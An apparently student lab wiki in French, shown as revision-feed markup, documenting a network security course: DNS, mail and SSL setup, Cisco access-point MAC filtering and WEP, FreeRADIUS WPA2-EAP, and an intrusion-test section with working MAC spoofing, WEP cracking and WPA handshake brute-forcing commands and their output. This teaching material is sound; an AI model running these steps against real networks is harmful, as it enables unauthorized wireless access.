dans gandi.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
on peut verifier que notre dns est secure a l'adresse suivante:&lt;br /&gt;
http://dnsviz.net/d/love-in-the-world.space/dnssec/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 # newaliases&lt;br /&gt;
 # mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# cat /etc/network/interfaces&lt;br /&gt;
# source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
# auto lo&lt;br /&gt;
# iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
Ethernet interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
  address 172.26.79.241&lt;br /&gt;
  netmask 255.255.240.0&lt;br /&gt;
  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ls&lt;br /&gt;
# aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
# gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23392</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23392"/>
				<updated>2015-11-27T13:48:50Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
